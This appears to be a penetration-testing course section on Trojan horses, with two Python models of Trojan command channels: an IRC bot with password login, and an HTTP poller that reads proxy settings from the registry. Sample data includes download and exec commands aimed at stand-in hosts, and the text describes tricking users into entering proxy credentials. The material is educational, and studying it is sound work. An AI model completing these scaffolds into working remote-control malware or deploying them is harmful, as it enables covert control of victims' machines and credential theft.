Trojan horses are rarely used in penetration tests; they do, however, make up a large part of the post-exploitation process. For more information about Trojan horses, please visit the Wikipedia link.
Trojan horses fall into three main families: binary Trojans, open source Trojans and "world domination" Trojans (bots). Within each family a Trojan is either a "bind connection" or a "reverse connection" Trojan, depending on its connectivity architecture. A bind Trojan opens a listening port on the victim and waits for the attacker to connect in; as we saw with Netcat, a reverse Trojan instead connects from the victim out to the attacker, which is what lets it traverse NAT.
Binary Trojan Horses
These Trojans are distributed in binary form (exe) and usually include a graphical "Trojan configuration" interface. They are built for mischief and damage, and often include features such as "swap mouse buttons", "eject CD-ROM", "spy on webcam" and so on. Binary Trojans are considered extremely unsafe to use: the binary cannot be reviewed, and such Trojans often contain backdoors themselves.
Open source Trojan horses
Open source Trojan horses are preferred because their source code can be reviewed for backdoor functions. Even so, there have been several cases where an open source Trojan contained a backdoor, so trusting open source Trojans blindly is not recommended either. A further benefit of open source Trojans is that they can be modified and enhanced to suit our needs.
Spybot
Spybot is an IRC based Trojan. It acts as an IRC client that connects to an IRC server (hosted either by the attacker or by a third party). The Trojan requires a password before it accepts commands; once the operator has logged in, it listens for IRC chat commands and executes them on the victim machine.
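The following is an added example (not Spybot's source or any real bot's code) that models the control channel described above: the bot speaks just enough IRC to stay connected (answering PING, joining a channel on the welcome numeric) and accepts operator commands only after a password login. The ".login"/".exec" command syntax, the nick and channel names and the constructed session lines are assumptions of this example; commands are queued rather than executed.

```python
"""Model of an IRC-controlled Trojan's command channel (the Spybot pattern).

Added example, not Spybot's source. The dot-command syntax, the channel and
nick names and the SESSION lines are constructed assumptions.
"""
import hmac


class BotState:
    def __init__(self, nick, channel, password):
        self.nick = nick
        self.channel = channel
        self.password = password
        self.master = None     # nick that has authenticated, None until .login
        self.queued = []       # (command, argument) pairs a real bot would execute


def parse_line(raw):
    """Split one IRC line into (prefix, command, params, trailing)."""
    line = raw.rstrip("\r\n")
    prefix = None
    if line.startswith(":"):               # ":nick!user@host CMD ..." form
        prefix, _, line = line[1:].partition(" ")
    trailing = None
    if " :" in line:                       # last parameter may contain spaces
        line, _, trailing = line.partition(" :")
    parts = line.split()
    if not parts:
        return None
    return prefix, parts[0].upper(), parts[1:], trailing


def handle_line(state, raw):
    """Return the lines the bot would send in reply to one server line."""
    parsed = parse_line(raw)
    if parsed is None:
        return []
    prefix, cmd, params, trailing = parsed
    if cmd == "PING":                      # keepalive: answer or get disconnected
        token = trailing if trailing is not None else (params[0] if params else "")
        return ["PONG :" + token]
    if cmd == "001":                       # RPL_WELCOME: registered, join control channel
        return ["JOIN " + state.channel]
    if cmd != "PRIVMSG" or trailing is None or not prefix:
        return []
    nick = prefix.split("!", 1)[0]
    target = params[0] if params else ""
    # Only react to dot-commands sent to the control channel or directly to us.
    if target not in (state.channel, state.nick) or not trailing.startswith("."):
        return []
    word, _, arg = trailing[1:].partition(" ")
    word = word.lower()
    if word == "login":
        if hmac.compare_digest(arg.strip().encode(), state.password.encode()):
            state.master = nick
            return ["PRIVMSG %s :[auth] %s logged in" % (state.channel, nick)]
        return []                          # wrong password: stay silent
    if nick != state.master:
        return []                          # not logged in: ignore everything else
    if word == "logout":
        state.master = None
        return []
    state.queued.append((word, arg.strip()))
    return ["PRIVMSG %s :[%s] queued" % (state.channel, word)]


def run_session(lines, nick="bot01", channel="#ctl", password="s3cret"):
    """Feed a list of raw server lines through the bot; return (sent lines, state)."""
    state = BotState(nick, channel, password)
    sent = []
    for line in lines:
        sent.extend(handle_line(state, line))
    return sent, state


# Constructed session: server keepalive, welcome, an intruder probing the bot,
# then the real operator logging in and issuing commands.
SESSION = [
    "PING :irc.example.test",
    ":irc.example.test 001 bot01 :Welcome",
    ":mallory!m@evil PRIVMSG #ctl :.sysinfo",
    ":mallory!m@evil PRIVMSG #ctl :.login guess",
    ":op!o@home PRIVMSG #ctl :.login s3cret",
    ":op!o@home PRIVMSG #ctl :.sysinfo",
    ":mallory!m@evil PRIVMSG #ctl :.exec calc.exe",
    ":op!o@home PRIVMSG bot01 :.download http://updates.example.test/x.bin",
]

if __name__ == "__main__":
    for line in run_session(SESSION)[0]:
        print("->", line)
```

Note that this model identifies the operator by nick alone, which anyone on the server can spoof after the login; the real bots compared the full nick!user@host mask, and a channel operator who can read the channel also sees the password go by in clear text, which is why the IRC server is usually one the attacker controls.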
Insider
Insider is an HTTP based Trojan built to bypass corporate firewalls and content inspection systems. It periodically issues an HTTP GET request to a predefined web server that hosts a list of commands to execute. The Trojan looks for the proxy server address in the registry and, if one is configured, uses that proxy to reach the web. If the proxy requires authentication, the Trojan pops up a proxy authentication dialog, which the unsuspecting user will hopefully fill in.
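As an added example (this is not Insider's code), the script below models the polling scheme just described: it reads the user's proxy from the same registry key that Internet Explorer uses on Windows (falling back to the HTTP_PROXY environment variable elsewhere), fetches a command list with an ordinary looking GET, and parses it. The command file format, the local web server used so the demo runs offline, and the constructed command list are assumptions of this example; commands are returned, not executed. The proxy authentication pop-up is not reproduced.

```python
"""Model of an HTTP-polling Trojan's command channel (the Insider pattern).

Added example, not Insider's code. The "id|command|argument" file format, the
in-process web server and COMMAND_FILE are constructed assumptions.
"""
import os
import sys
import threading
import urllib.request
from http.server import BaseHTTPRequestHandler, HTTPServer

# Constructed command list as a web server would host it. Serving it as a
# static file means every poll returns the same lines, so the client must
# remember which ids it has already handled.
COMMAND_FILE = b"""# constructed command list
1|sysinfo|
2|download|http://updates.example.test/tool.bin
3|exec|tool.bin -q
this line has no fields and is ignored
"""


def discover_proxy():
    """Return 'host:port' of the user's configured proxy, or None.

    On Windows this is the per-user Internet Settings key (what IE/WinINet
    read); elsewhere the HTTP_PROXY environment variable stands in for it.
    """
    if sys.platform == "win32":
        import winreg
        key_path = r"Software\Microsoft\Windows\CurrentVersion\Internet Settings"
        try:
            with winreg.OpenKey(winreg.HKEY_CURRENT_USER, key_path) as key:
                enabled, _ = winreg.QueryValueEx(key, "ProxyEnable")
                server, _ = winreg.QueryValueEx(key, "ProxyServer")
        except OSError:
            return None
        return server if enabled and server else None
    return os.environ.get("HTTP_PROXY") or os.environ.get("http_proxy")


def parse_command_list(text, seen):
    """Parse 'id|command|argument' lines; skip comments, junk and already-seen ids."""
    commands = []
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line.startswith("#"):
            continue
        fields = line.split("|", 2)
        if len(fields) != 3 or not fields[0].isdigit():
            continue
        cid = int(fields[0])
        if cid in seen:
            continue
        seen.add(cid)
        commands.append({"id": cid, "cmd": fields[1].lower(), "arg": fields[2]})
    return commands


def fetch_commands(url, seen, proxy=None, timeout=5):
    """One poll: plain GET through the given proxy (None = direct), then parse."""
    opener = urllib.request.build_opener(
        urllib.request.ProxyHandler({"http": proxy} if proxy else {}))
    request = urllib.request.Request(
        url, headers={"User-Agent": "Mozilla/4.0 (compatible; MSIE 6.0)"})
    with opener.open(request, timeout=timeout) as response:
        body = response.read().decode("utf-8", "replace")
    return parse_command_list(body, seen)


class _CommandHost(BaseHTTPRequestHandler):
    """Stand-in for the attacker's web server: serves COMMAND_FILE at /cmd.txt."""
    def do_GET(self):
        if self.path != "/cmd.txt":
            self.send_error(404)
            return
        self.send_response(200)
        self.send_header("Content-Type", "text/plain")
        self.send_header("Content-Length", str(len(COMMAND_FILE)))
        self.end_headers()
        self.wfile.write(COMMAND_FILE)

    def log_message(self, *args):
        pass


def start_command_host():
    server = HTTPServer(("127.0.0.1", 0), _CommandHost)
    threading.Thread(target=server.serve_forever, daemon=True).start()
    return server, "http://127.0.0.1:%d/cmd.txt" % server.server_address[1]


def demo():
    """Poll the local command host twice; the second poll must yield nothing new."""
    server, url = start_command_host()
    try:
        seen = set()
        first = fetch_commands(url, seen, proxy=None)
        second = fetch_commands(url, seen, proxy=None)
    finally:
        server.shutdown()
        server.server_close()
    return first, second


if __name__ == "__main__":
    print("proxy:", discover_proxy())
    for batch in demo():
        print(batch)
```

From the defender's side this traffic is a fixed-interval GET for the same URL from a host that otherwise browses normally, which is exactly what the proxy log records; periodicity, not content, is the signature.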
World domination Trojan horses
These Trojan horses can be considered "hybrid worms", since their main function is to spread and infect additional computers, usually by means of common exploits. They scan the Internet (or a predefined IP range) for vulnerable computers; when one is found and exploited, the Trojan uploads a copy of itself to the new victim, executes it, and the copy starts scanning in turn. Armed with fresh exploits, these Trojans can spread extremely fast.
These Trojans (bots) usually join together into a "botnet", which can be used for DDoS attacks, spreading spam and other unpleasant purposes.
Rxbot
Rxbot is an IRC based Trojan with spreading capabilities. Because of the risk of uncontrolled spreading, this Trojan will only be reviewed at the source code level. It contains some very interesting anti-debugging code, including VMware detection. BE CAREFUL!